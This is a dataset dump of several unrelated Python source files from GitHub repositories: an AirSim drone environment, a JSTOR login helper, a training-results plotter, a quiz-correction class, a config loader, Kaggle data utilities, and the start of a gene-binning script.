range_max=8), self.GenerateGoal(range_min=9, range_max=12), self.GenerateGoal(range_min=13, range_max=15)]\n # self.goals = self.GoalsToQuadFrame(goal)\n self.goal = self.GoalsToQuadFrame(self.GenerateGoal(range_min=3, range_max=10))\n self.num_reached_goals = 0\n self.goal_ind = 0\n print(f\"goal is {self.goal}\")\n\n self.airsimClient.confirmConnection()\n self.airsimClient.reset()\n self.airsimClient.enableApiControl(True)\n self.airsimClient.armDisarm(True)\n\n quad_state = self.airsimClient.getMultirotorState().kinematics_estimated\n # self.randomizeGoal()\n state,state_tup = self._extract_state(quad_state)\n self.isReseted = True\n self.done = False\n self.time_step = 0 \n time.sleep(0.1)\n\n # State and reward Normalization\n self.state_mean_prev = AirsimEnv.state_mean.copy()\n AirsimEnv.state_mean = self.state_mean_prev + ((1/AirsimEnv.k)*(state.copy() - self.state_mean_prev))\n AirsimEnv.state_s_k += (state.copy() - self.state_mean_prev) * (state.copy() - AirsimEnv.state_mean.copy())\n if AirsimEnv.k == 1:\n state_std = np.zeros(14)\n state_std += 0.01\n else:\n state_std = np.sqrt(AirsimEnv.state_s_k.copy()/(max(AirsimEnv.k-1,2)))\n\n\n\n # print(f\"state {state} shape {state.shape}\")\n # print(f\"mean {self.state_mean} shape {self.state_mean.shape}\")\n # print(f\"state_std {state_std} shape {state_std.shape}\")\n # print(f\"K {self.k}\")\n\n\n #state = (state - AirsimEnv.state_mean.copy()) / state_std\n\n # print(f\"norm state {state} shape {state.shape}\")\n # print(f\"Goal position {self.goal}\")\n return state\n\n \n # compute the distance to goal (DTG) reward\n def _compute_DTG_reward(self, state_tup, goal, actions):\n quad_postion = state_tup[0]\n quad_vel = state_tup[1]\n angles = state_tup[2]\n\n weights = [1, 1, 1, 0.05, 0.05, 0.05, 0.1, 0.1, 0.1]\n l2_dis = (( weights[0] * (quad_postion[0] - goal[0])**2) \n + ( weights[1] * (quad_postion[1] - goal[1])**2) + weights[2] * (quad_postion[2] - goal[2])**2) \n # vel_pen = weights[3] * quad_vel[0]**2 + weights[4] * quad_vel[1]**2 + weights[5] * quad_vel[2]**2\n # actions_pen = (weights[6] * (actions[0]**2)) + (weights[7] * (actions[1]**2)) +(weights[8] * (actions[2]**2))\n # angles_pen = np.sum(0.1*angles**2)\n # print(f'l2_dis {l2_dis}')\n # print(f'vel_pen {vel_pen}')\n # print(f'actions_pen {actions_pen}')\n return -l2_dis #+ vel_pen + actions_pen + angles_pen)\n\n def _extract_state(self, quad_state):\n position_x = quad_state.position.x_val\n position_y = quad_state.position.y_val\n position_z = quad_state.position.z_val\n # print(position_x, position_y, position_z)\n position = np.array([position_x, position_y, position_z ])\n # position = quad_state.position.to_numpy_array()\n linear_velocity = quad_state.linear_velocity.to_numpy_array()\n orientation_quaternions = quad_state.orientation.to_numpy_array()\n orientation_angles,_ = self._conver_quaternoins_to_euler_angles(orientation_quaternions)\n angular_velocity = quad_state.angular_velocity.to_numpy_array()\n d = self._compute_l2_distance(position, self.goal)\n angle = np.arctan2((self.goal[1] - position_y), (self.goal[0] - position_x))\n # angle *= (180 / np.pi)\n\n\n state = np.concatenate((position ,linear_velocity, orientation_angles, angular_velocity))\n state = np.append(state, d)\n state = np.append(state, angle)\n # print(f\"state {state}\")\n # print(f\"angle in degrees is {angle * 180 / np.pi}\")\n # import pdb; pdb.set_trace()\n return state, (position, linear_velocity, orientation_angles, angular_velocity, d, angle)\n\n def randomizeGoal(self):\n self.goal = [np.random.uniform(-30, 30)\n , np.random.uniform(-30, 30)\n , np.random.uniform(-5,-15)]\n\n # Convet a state vector to a dictionary fot logging purposes\n def _state_to_dict(self, state):\n state_dict = {'x position': state[0],\n 'y position': state[1],\n 'z position': state[2],\n 'x linear velocity': state[3],\n 'y linear velocity': state[4],\n 'z linear velocity': state[5],\n 'roll orientation' : state[6],\n 'pitch orientation': state[7],\n 'yaw orientation' : state[8],\n 'x angular velocity': state[9],\n 'y angular velocity': state[10],\n 'z angular velocity': state[11]}\n return state_dict\n\n # Convet an action vector to a dictionary fot logging purposes\n def _action_to_dict(self, action):\n action_dict = {'roll rate' : action[0],\n 'pitch rate': action[1],\n 'yaw rate' : action[2],\n 'throttle' : 0.6 }\n return action_dict\n\n # compute the l2/euclidian distance between two points\n def _compute_l2_distance(self, pos1, pos2):\n l2_dis = np.sqrt(((pos1[0] - pos2[0])**2 )+ ((pos1[1] - pos2[1])**2) + ((pos1[2] - pos2[2])**2) )\n return l2_dis\n\n # Convert a quaternioin values to euler angles to check for \n def _conver_quaternoins_to_euler_angles(self, q):\n # roll pitch yaw\n euler_angles_rad = np.array([\n math.atan2(2*(q[0]*q[1] + q[2]*q[3]), 1 - 2*(q[1]**2 + q[2]**2)), # roll\n math.asin(2*(q[0]*q[2] - q[3]*q[1])), # pitch\n math.atan2(2*(q[0]*q[3] + q[1]*q[2]), 1 - 2*(q[2]**2 + q[3]**2)) # yae\n ])\n euler_angles_degrees = euler_angles_rad * (180/np.pi)\n\n return euler_angles_rad, euler_angles_degrees\n\n # transform the location from unity frame of reference to the quad frame of reference\n def _r_u_to_q(self, point):\n R = np.array([[0,0,1],[1,0,0],[0,-1,0]])\n p_quad_frame = R.dot(point)\n if p_quad_frame[2] > 0:\n p_quad_frame[2] *= -1\n return p_quad_frame\n\n def GoalsToQuadFrame(self, goals):\n R = np.array([[0,0,1],[1,0,0],[0,-1,0]])\n\n goals = np.array(goals)\n goals_quad_frame = goals.dot(R)\n\n goals_quad_frame[2] = np.clip(goals_quad_frame[2], -10, -4)\n return goals_quad_frame\n\n # def GenerateGoal(self, range_min = 8, range_max = 10):\n # count = 1\n # d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n # dis = np.sqrt(d[0]**2 + d[1]**2+ d[2]**2)\n # while not (dis >= range_min and dis <= range_max):\n # d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n # dis = np.sqrt(d[0]**2 + d[1]**2+ d[2]**2)\n # if dis < range_min:\n # count += 1\n # else:\n # count -= 1\n # return d\n def GenerateGoal(self, range_min =5 ,range_max = 10, init_point=[0,0,0]):\n count = 1.\n num_iter = 0\n d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n dis = np.sqrt((d[0]-init_point[0])**2 + (d[1]-init_point[1])**2+ (d[2]-init_point[2])**2)\n\n while not (dis < range_max and dis > range_min):\n num_iter += 1\n d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n dis = np.sqrt((d[0]-init_point[0])**2 + (d[1]-init_point[1])**2+ (d[2]-init_point[2])**2)\n\n if dis <= range_min:\n count += 0.1\n elif dis > range_max:\n count -= 0.1\n # elif num_iter >= 1000000:\n # break\n\n # print(f\"dis {dis}\")\n d_s = [d + init_point, init_point - d]\n random.shuffle(d_s)\n return d_s[0]\n\n\n\n","repo_name":"FaisalAhmed0/gym-airsim","sub_path":"gym_airsim/envs/airsm_backup.py","file_name":"airsm_backup.py","file_ext":"py","file_size_in_byte":18084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35542461985","text":"import time\nimport emoji\nimport os\n\nfrom termcolor import colored\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.common.by import By\nfrom src.errors import MainException, TypoException\n\nfrom src.helpers import system, print_typo\n\nis_windows = system()\n\n\ndef print_login_requirements():\n\n print(colored(\"\\n\\n\\nSet-up and Dependencies\", attrs=[\"reverse\"]))\n\n print(colored(\"\\n\\nPlease note:\", attrs=[\"reverse\"]) * (is_windows))\n print(colored(\"\\n\\nPlease note:\", attrs=[\"bold\", \"underline\"]) * (not is_windows))\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Valid JSTOR login credentials are a requirement to use this tool.\"\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" You will need Google Chrome installed on your device.\"\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" You will need ffmpeg and ffprobe installed on your device.\"\n )\n\n print(\n \"\\n\\nBefore you start, \"\n + colored(\"ensure that you:\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"ensure that you:\", attrs=[\"bold\", \"underline\"]) * (not is_windows)\n )\n\n print(\n \"• Have Google Chrome installed. To install, visit https://support.google.com/chrome/answer/95346?hl=en&ref_topic=7439538. \\n• Have ffmpeg and ffprobe installed. For installation instructions, visit https://www.wikihow.com/Install-FFmpeg-on-Windows. \\n• Have a stable internet connection.\\n• Keep your device on charge and set to 'never sleep' while on battery and on charge.\"\n * (is_windows)\n )\n\n print(\n \"• Have Google Chrome installed. To install, visit https://support.google.com/chrome/answer/95346?hl=en&ref_topic=7439538. \\n• Have ffmpeg and ffprobe installed. For installation instructions, visit https://bbc.github.io/bbcat-orchestration-docs/installation-mac-manual/. \\n• Have a stable internet connection.\\n• Keep your device on charge and set to 'never sleep' while on battery and on charge.\"\n * (not is_windows)\n )\n\n print(\n \"\\n\\nWhile the program runs, \"\n + colored(\"please do not:\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"please do not:\", attrs=[\"bold\", \"underline\"]) * (not is_windows)\n )\n\n print(\n \"\\n• Close the Google Chrome window that will be opened in the next steps.\\n• Interfere with the Google Chrome window unless prompted to do so.\"\n )\n\n get_input(\n colored(\"\\n\\n-- Press \")\n + colored(\"ENTER/RETURN\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"ENTER/RETURN\", attrs=[\"bold\"]) * (not is_windows)\n + colored(\" to continue: \")\n )\n\n\ndef print_login_instructions():\n\n print(\"\\n\\n\\n\" + colored(\"JSTOR Login\", attrs=[\"reverse\"]))\n\n print(\n \"\\n\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" To continue, a JSTOR user login is required, either via institution VPN/wifi or manually via the JSTOR website.\"\n )\n\n time.sleep(1)\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" No login information will be recorded in the process.\"\n )\n\n time.sleep(1)\n\n print(\n \"\\n\\n\"\n + colored(\"User credential security information:\", attrs=[\"reverse\"])\n * (is_windows)\n + colored(\"User credential security information:\", attrs=[\"bold\", \"underline\"])\n * (not is_windows)\n )\n\n print(\n \"\\n\\n• If you choose to login via VPN or wifi, your credentials will already be authenticated and you won't need to provide\\n any login details.\\n• If you choose to login via the JSTOR website, you will be prompted to enter your login details via your university\\n portal on JSTOR.\"\n )\n\n time.sleep(2)\n\n print(\n \"\\n\\n\"\n + colored(\"JSTOR Login Instructions:\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"JSTOR Login Instructions:\", attrs=[\"bold\", \"underline\"])\n * (not is_windows)\n + \"\\n\"\n )\n\n\ndef receive_login_action():\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Please follow the prompts below to login.\"\n )\n\n login_method = get_input(\n colored(\n \"\\n-- Type [1] to login via institution VPN or wifi\"\n + \"\\n-- Type [2] to manually login via the JSTOR website\"\n + \"\\n-- Type [3] to return to main menu\"\n + \"\\n : \",\n )\n )\n\n return login_method\n\n\ndef vpn_login(driver, url, html_load, html_login):\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Follow the steps below:\"\n )\n\n time.sleep(1)\n\n print(\n colored(\n \"\\n\\nStep 1/1: Please connect to your institution's VPN or wifi, then continue.\\n\",\n \"blue\",\n )\n )\n\n time.sleep(1)\n\n cont = receive_proceed_action()\n\n if cont == \"1\":\n\n print(\"\\nGive it a second, we are checking for successful login.\\n\")\n\n driver.get(url)\n\n if validate_page_load(driver, html_load) == False:\n return False\n\n time.sleep(2)\n\n if validate_login(driver, html_login) == True:\n\n driver.maximize_window()\n\n return True\n\n else:\n\n return False\n\n elif cont == \"2\":\n\n driver.close()\n\n return False\n\n\ndef manual_login(driver, url, html_load, html_login):\n\n print(\"\\nYou are now being routed to JSTOR home page.\")\n\n time.sleep(2)\n\n print(\"\\nSit tight and wait for Google Chrome to open on your screen.\\n\")\n\n time.sleep(2)\n\n print(\n \"\\n\"\n + (colored(\" i \", \"blue\", attrs=[\"reverse\"])) * (is_windows)\n + (emoji.emojize(\":information:\")) * (not is_windows)\n + \" While the browser opens, read through the login steps:\"\n )\n\n time.sleep(1)\n\n print(\n colored(\n \"\\nStep 1/4: Navigate to the top of the JSTOR home page, and click on the link: \",\n \"blue\",\n )\n + colored(\n \"Log in through your library.\",\n \"blue\",\n attrs=[\"reverse\"],\n )\n * (is_windows)\n + colored(\n \"Log in through your library.\",\n \"blue\",\n attrs=[\"bold\"],\n )\n * (not is_windows)\n + colored(\n \"\\nStep 2/4: Search for your institution by using the search box.\\nStep 3/4: Log in using your institution's login credentials.\\nStep 4/4: Accept the cookies.\",\n \"blue\",\n )\n )\n\n time.sleep(1)\n\n print(\"\\nGive it a second, we are checking if the page has loaded successfully.\")\n\n driver.get(url)\n\n if validate_page_load(driver, html_load) == False:\n\n return False\n\n try:\n driver.maximize_window()\n except:\n print(\n \"\\n\"\n + (colored(\" i \", \"blue\", attrs=[\"reverse\"])) * (is_windows)\n + (emoji.emojize(\":information:\")) * (not is_windows)\n + (\n \" Failed to open browser window. Please open the Google Chrome tab below.\"\n )\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Once you have completed the steps, continue:\"\n )\n\n cont = receive_proceed_action()\n\n if cont == \"1\":\n\n if validate_page_load(driver, html_load) == False:\n\n return False\n\n print(\"\\nChecking for successful login.\\n\")\n\n time.sleep(1)\n\n if validate_login(driver, html_login) == True:\n\n try:\n driver.maximize_window()\n driver.set_window_position(-2024, 2024)\n except:\n driver.set_window_position(-2024, 2024)\n\n return True\n\n else:\n\n return False\n\n else:\n\n driver.close()\n\n return False\n\n\ndef validate_page_load(driver, html_load):\n\n try:\n\n WebDriverWait(driver, 60).until(\n expected_conditions.element_to_be_clickable(\n (\n By.CLASS_NAME,\n html_load,\n )\n )\n )\n\n except:\n\n print(\n \"\\n\"\n + colored(\" ! \", \"red\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":red_exclamation_mark:\") * (not is_windows)\n + colored(\" Unable to load JSTOR page.\\n\", \"red\")\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Check your internet connection and try again.\\n\"\n )\n\n driver.close()\n\n return False\n\n \"pds__access-provided-by\"\n\n\ndef validate_login(driver, html_login):\n\n try:\n driver.find_element(By.CLASS_NAME, html_login)\n\n time.sleep(1)\n\n print(\n \"\\n\"\n + colored(\" ! \", \"green\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":check_mark_button:\") * (not is_windows)\n + colored(\" Login was successful!\\n\", \"green\")\n )\n\n time.sleep(1)\n\n return True\n\n except:\n\n time.sleep(1)\n\n print_unsuccessful()\n\n return False\n\n\ndef print_unsuccessful():\n\n print(\n \"\\n\"\n + colored(\" ! \", \"red\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":red_exclamation_mark:\") * (not is_windows)\n + colored(\" Login was unsuccessful\\n\", \"red\")\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Try again, make sure you follow the instructions carefully.\\n\"\n )\n\n\ndef receive_proceed_action():\n\n proceed_input = get_input(\n colored(\n \"\\n-- Type [1] to continue\\n-- Type [2] to return to contributions menu\\n : \"\n )\n )\n if proceed_input != \"1\" and proceed_input != \"2\":\n\n print_typo()\n\n return receive_proceed_action()\n\n return proceed_input\n\n\ndef receive_end_program_action(driver):\n\n exit_program = get_input(\n colored(\n \"\\n-- Type [1] to make another contribution\\n-- Type [2] to go back to main menu\\n-- Type [3] to exit\\n : \"\n )\n )\n\n try:\n return process_end_program_action(driver, exit_program)\n except TypoException:\n return receive_end_program_action(driver)\n\n\ndef process_end_program_action(driver, exit_program):\n\n if exit_program == \"1\":\n return 0\n elif exit_program == \"2\":\n driver.close()\n raise MainException\n elif exit_program == \"3\":\n driver.close()\n os._exit(0)\n\n else:\n print_typo()\n raise TypoException\n\n\ndef get_input(text):\n return input(text).strip()\n","repo_name":"FinHubSA/AK-PDF-Scraper","sub_path":"src/user_login.py","file_name":"user_login.py","file_ext":"py","file_size_in_byte":11456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37704310076","text":"from pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\ndef plot_results(start=0, stop=0, bucket='', id=(), labels=(), save_dir=''):\n # Plot training 'results*.txt'. from utils.plots import *; plot_results(save_dir='runs/train/exp')\n fig, ax = plt.subplots(2, 5, figsize=(12, 6), tight_layout=True)\n ax = ax.ravel()\n s = ['Box', 'Objectness', 'Classification', 'Precision', 'Recall',\n 'val Box', 'val Objectness', 'val Classification', 'mAP@0.5', 'mAP@0.5:0.95']\n if bucket:\n # files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]\n files = ['results%g.txt' % x for x in id]\n c = ('gsutil cp ' + '%s ' * len(files) + '.') % tuple('gs://%s/results%g.txt' % (bucket, x) for x in id)\n os.system(c)\n else:\n files = list(Path(save_dir).glob('results*.txt'))\n assert len(files), 'No results.txt files found in %s, nothing to plot.' % os.path.abspath(save_dir)\n for fi, f in enumerate(files):\n try:\n results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T\n n = results.shape[1] # number of rows\n x = range(start, min(stop, n) if stop else n)\n for i in range(10):\n y = results[i, x]\n if i in [0, 1, 2, 5, 6, 7]:\n y[y == 0] = np.nan # don't show zero loss values\n # y /= y[0] # normalize\n label = labels[fi] if len(labels) else f.stem\n ax[i].plot(x, y, marker='.', label=label, linewidth=2, markersize=8)\n ax[i].set_title(s[i])\n # if i in [5, 6, 7]: # share train and val loss y axes\n # ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])\n except Exception as e:\n print('Warning: Plotting error for %s; %s' % (f, e))\n\n ax[1].legend()\n fig.savefig(Path(save_dir) / 'results.png', dpi=200)\n\nplot_results(save_dir='runs/train/yolov7-mixed2')","repo_name":"rico227/traffic-sign-recognition","sub_path":"scripts/plot_unfinished_training_results.py","file_name":"plot_unfinished_training_results.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29156638617","text":"from PIL import Image as im\nimport concurrent.futures as future\nimport cv2 as cv\nimport numpy as np\nfrom pyautogui import *\nfrom time import perf_counter as pc\nfrom graphics import *\nimport operator\n\n\nclass Correct:\n def __init__(self, input):\n self.input = input\n self.score = {}\n self.corrected_skilje = {}\n self.corrected = {} # huriva en person fick rätt eller fel på en fråga\n self.sorted_by_skilje = []\n self.question_number = 0\n\n def get_names(self):\n return self.input.get_names()\n\n def get_sorted_by_skilje(self):\n return self.sorted_by_skilje\n\n def get_one_correct_answers(self, question_number):\n self.question_number = question_number\n for image_name in self.input.answers:\n if question_number == 0:\n self.corrected[self.input.get_names()[image_name]] = {}\n self.score[image_name] = 0\n else:\n # print(str(self.input.correct_answers[question_number]))\n if str(self.input.answers[image_name][question_number]) == str(\n self.input.correct_answers[question_number]\n ):\n self.corrected[self.input.get_names()[image_name]][\n question_number\n ] = \"correct\"\n self.score[image_name] += 1\n else:\n self.corrected[self.input.get_names()[image_name]][\n question_number\n ] = \"wrong\"\n # print(self.score, \"poäng\")\n\n def get_correct_answers(\n self,\n ): # ifall man är otolig och vill rätta allt samtidigt;)\n for image_name in self.input.answers:\n self.corrected[image_name] = {}\n self.score[image_name] = 0\n for question_number in self.input.correct_answers:\n if str(self.input.answers[image_name][question_number]) == str(\n self.input.correct_answers[question_number]\n ):\n self.corrected[image_name][question_number] = \"correct\"\n self.score[image_name] += 1\n else:\n self.corrected[image_name][question_number] = \"wrong\"\n # print(self.score, \"score\")\n\n def compare_skilje(self):\n # returnar kanske en dic med imagename:skillnad ifrån svaret.\n for image_name in self.input.answers:\n diff = abs(\n int(self.input.skilje[image_name]) - int(self.input.correct_skilje)\n )\n self.corrected_skilje[image_name] = diff\n\n def dont_compare_skilje(self):\n for image_name in self.input.answers:\n self.corrected_skilje[image_name] = int(self.input.skilje[image_name])\n\n def print_method(self):\n self.sorted_by_skilje = []\n sorted_by_value = dict(\n sorted(self.score.items(), key=operator.itemgetter(1), reverse=True)\n )\n self._print_method(True, sorted_by_value)\n i = 0\n for name_list in self.sorted_by_skilje:\n self.sorted_by_skilje[i][0] = self.input.get_names()[name_list[0]]\n i += 1\n\n def _print_method(self, bol, sorted_by_value): # första sorteringen\n i = 1\n bol = False # om man gått igenom en hel print_method utan att ändra ordning i listan är man klar och bol blir False.\n for image_name, score in sorted_by_value.items():\n if i == 1:\n self.sorted_by_skilje.append(\n [image_name, score, self.corrected_skilje[image_name]]\n )\n else:\n if sorted_by_value[image_name] == self.sorted_by_skilje[i - 2][1]:\n if (\n self.corrected_skilje[image_name]\n < self.sorted_by_skilje[i - 2][2]\n ):\n bol = True\n last_sorted = self.sorted_by_skilje[i - 2]\n self.sorted_by_skilje[i - 2] = [\n image_name,\n score,\n self.corrected_skilje[image_name],\n ]\n self.sorted_by_skilje.append(last_sorted)\n else:\n\n self.sorted_by_skilje.append(\n [image_name, score, self.corrected_skilje[image_name]]\n )\n else:\n self.sorted_by_skilje.append(\n [image_name, score, self.corrected_skilje[image_name]]\n )\n i += 1\n # print(self.sorted_by_skilje, \"sorterat by skilje\")\n return self._double_print_method(bol)\n\n def _double_print_method(\n self, bol\n ): # ifall många har exakt samma poäng kan även denna behövas\n i = 1\n if (\n bol == False\n ): # basfall i rekuriton ifall det inte ändrades nåt förra gången är vi klara\n return \"\"\n bol = False\n for image_list in self.sorted_by_skilje:\n image_name = image_list[0]\n score = image_list[1]\n skilje = image_list[2]\n if i != 1:\n if score == self.sorted_by_skilje[i - 2][1]:\n if skilje < self.sorted_by_skilje[i - 2][2]:\n bol = True\n last_sorted = self.sorted_by_skilje[i - 2]\n self.sorted_by_skilje[i - 2] = [\n image_name,\n score,\n self.corrected_skilje[image_name],\n ]\n self.sorted_by_skilje[i - 1] = last_sorted\n else:\n self.sorted_by_skilje[i - 1] = [\n image_name,\n score,\n self.corrected_skilje[image_name],\n ]\n i += 1\n return self._double_print_method(bol)\n","repo_name":"jonatca/paperQuizCorrector","sub_path":"correct.py","file_name":"correct.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24183966578","text":"import os\nimport platform\n\nimport yaml\n\n# All configs placed into config/configs.yaml file. Please declare only variables here and set all values in yaml file\n\nwith open(f'{os.path.dirname(os.path.abspath(__file__))}/configs.yaml') as CONFIGS:\n CONFIGS = yaml.safe_load(CONFIGS)\n ENV_CONFIGS = CONFIGS['environments'][os.getenv('ENVIRONMENT', 'dev')]\n URLS = CONFIGS['urls']\n GENERAL = CONFIGS['general']\n CONTROLLERS = CONFIGS['controllers']\n\n\n def get_value(key, key_type, *args):\n \"\"\"\n Get constant value from YAML file by default, or from environment variables if exists\n \"\"\"\n value = os.getenv(key.upper(), key_type[key])\n if args and not os.getenv(key.upper()):\n value = value.format(*args)\n return value\n\n\n # Environment settings\n TOKEN = os.getenv('TOKEN', get_value('token', CONFIGS))\n MAIN_API_URL = get_value('main_api_url', URLS)\n\n PROJECT = get_value('project', GENERAL)\n LINK_TYPE_TEST_CASE = get_value('link_type_test_case', GENERAL)\n LINK_TYPE_LINK = get_value('link_type_link', GENERAL)\n TEST_CASE = get_value('test_case', GENERAL)\n BUG = get_value('bug', GENERAL)\n GITHUB = get_value('git_path', GENERAL)\n FILTERED_LOG_ENDPOINTS = get_value('filtered_log_endpoints', CONFIGS)\n\nOS_NAME = platform.system()\nOS_VERSION = platform.version()\nOS_ARCHITECTURE = platform.architecture()\nTEST_DATA_DIR = 'framework/api/test_data'\n\nUSERS_PATH = get_value('users', CONTROLLERS)\n","repo_name":"Goraved/Typhon-API","sub_path":"configuration/config_parse.py","file_name":"config_parse.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30021172422","text":"\"\"\" data_tools module.\nContains DataTools class for data-oriented tasks\n\"\"\"\n\nimport os\nfrom datetime import datetime\nfrom typing import Tuple, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nfrom ..context import KglToolsContext, KglToolsContextChild\n\n__all__ = ['DataTools']\n\n\nclass DataTools(KglToolsContextChild):\n \"\"\" Data manipulating class\n Класс для работы с данными (загрузка, сохранение, разбивка и т.д.)\n\n Args:\n context: Контекст окружения\n\n Attributes:\n context (KglToolsContext): Контекст окружения\n settings (dict): Словарь с настройками\n random_state (int): Инициализирующее random значение\n X_train (pd.DataFrame): Обучающая выборка данных\n y_train (Union[pd.DataFrame, pd.Series]): Обучающая выборка данных\n X_validate, (pd.DataFrame): Валидационная выборка данных\n y_validate (Union[pd.DataFrame, pd.Series]): Валидационная выборка данных\n \"\"\"\n\n def __init__(self, context: KglToolsContext) -> None:\n super().__init__(context)\n self.settings = context.settings.get('data_tools', dict())\n self.random_state = context.random_state\n self.X_train = None\n self.y_train = None\n self.X_validate = None\n self.y_validate = None\n\n def get_validate_split(self,\n X: pd.DataFrame,\n y: Optional[pd.DataFrame] = None,\n validation_size: float = 0.2) -> Tuple[pd.DataFrame, ...]:\n \"\"\" Get validation split of the dataset\n Разбивка датасета на обучающую и валидационную выборки\n\n Args:\n X: Исходный датасет\n y: Датасет (вектор) с истинными ответами\n validation_size: Пропорция разбиения\n\n Returns:\n Кортеж датасетов (разбивок)\n \"\"\"\n if y is None:\n X_t, X_v = train_test_split(X, test_size=validation_size, shuffle=True,\n random_state=self.random_state)\n self.X_train = X_t\n self.X_validate = X_v\n return (X_t, X_v)\n else:\n X_t, X_v, y_t, y_v = train_test_split(X, y, test_size=validation_size, shuffle=True,\n stratify=y, random_state=self.random_state)\n self.X_train = X_t\n self.X_validate = X_v\n self.y_train = y_t\n self.y_validate = y_v\n return (X_t, X_v, y_t, y_v)\n\n def write_submission(self, predictions: np.ndarray) -> None:\n \"\"\" Write submissions file in proper format\n Запись файла с предсказаниями в заданном формате\n\n Args:\n predictions: Вектор или матрица с предсказаниями\n \"\"\"\n submission_settings = self.settings['submission_params']\n\n sample_submission_path = os.path.join(self.settings['path'], submission_settings['sample_file'])\n\n if not os.path.exists(sample_submission_path):\n print('DataTools::write_submission(): sample submission file is not exist!')\n return\n\n sample_sbm = pd.read_csv(sample_submission_path, **submission_settings['pd_read_csv_params'])\n sample_sbm[submission_settings['target_fields']] = predictions\n\n if not os.path.isdir(submission_settings['submissions_dir']):\n try:\n os.mkdir(submission_settings['submissions_dir'])\n except OSError:\n print('Can\\'t create metasets directory!')\n return\n\n sbm_filename = '{}_sbm.csv'.format(datetime.now().strftime(\"%Y-%m-%d_%H-%M\"))\n smb_filepath = os.path.join(submission_settings['submissions_dir'], sbm_filename)\n\n sample_sbm.to_csv(smb_filepath, **submission_settings['pd_write_csv_params'])\n\n print('save submission:\\n{}'.format(sbm_filename))\n\n def write_metaset(self, df: pd.DataFrame, filename: str) -> None:\n \"\"\" Write metaset file\n Запись датасета метапризнаков с указанным именем\n\n Args:\n df: Заданный датасет\n filename: Имя файла датасета\n \"\"\"\n metaset_settings = self.settings['metaset_params']\n\n if not os.path.isdir(metaset_settings['metasets_dir']):\n try:\n os.mkdir(metaset_settings['metasets_dir'])\n except OSError:\n print('Can\\'t create metasets directory!')\n return\n\n metaset_filepath = os.path.join(metaset_settings['metasets_dir'], filename)\n df.to_csv(metaset_filepath, header=True, index=True)\n\n def read_metaset(self, filename: str) -> Optional[pd.DataFrame]:\n \"\"\" Read metaset file\n Чтение датасета метапризнаков с указанным именем\n\n Args:\n filename: Имя файла датасета\n\n Returns:\n Датасет метапризнаков\n \"\"\"\n metaset_settings = self.settings['metaset_params']\n metaset_filepath = os.path.join(metaset_settings['metasets_dir'], filename)\n\n if not os.path.exists(metaset_filepath):\n print('DataTools::read_metaset(): metaset file is not exist!')\n return None\n\n return pd.read_csv(metaset_filepath, index_col=0)\n","repo_name":"aborisihin/kaggle_tools","sub_path":"kgltools/data_tools/_data_tools.py","file_name":"_data_tools.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40351087244","text":"#%matplotlib inline\n#import matplotlib.pyplot as plt\nimport os\nimport numpy as np\ndef assign_case_to_bin(case_label, bin_edges):\n i=0\n while i= bin_edges[i]:\n return i, bin_edges[i], bin_edges[i+1]\n else:\n i+=1\n\ngene_list= [\n'MGP']\nfor gene in gene_list:\n csvs={}\n splits= ['split1', 'split2', 